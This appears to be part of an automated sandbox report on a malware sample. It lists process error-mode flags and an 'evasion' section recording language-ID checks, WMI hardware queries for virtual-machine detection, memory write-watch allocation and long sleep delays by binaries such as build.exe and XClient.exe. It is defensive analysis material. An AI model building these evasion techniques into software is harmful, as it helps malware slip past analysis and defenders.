Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Code function: 10_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 10_2_009952A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 15_2_022552A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 15_2_022552A0
Source: C:\Windows\System32\FXSSVC.exe Code function: 39_2_00D252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 39_2_00D252A0
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe API/Special instruction interceptor: Address: A4D8BC
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe API/Special instruction interceptor: Address: C092A4
Source: C:\Users\user\AppData\Local\Temp\build.exe Memory allocated: D40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Memory allocated: 2A40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Memory allocated: 4A40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Memory allocated: 1060000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Memory allocated: 1AF00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: D40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 1AD20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 1170000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 1AD60000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\build.exe Window / User API: threadDelayed 1404
Source: C:\Users\user\AppData\Local\Temp\build.exe Window / User API: threadDelayed 1168
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Window / User API: threadDelayed 2359
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Window / User API: threadDelayed 7442
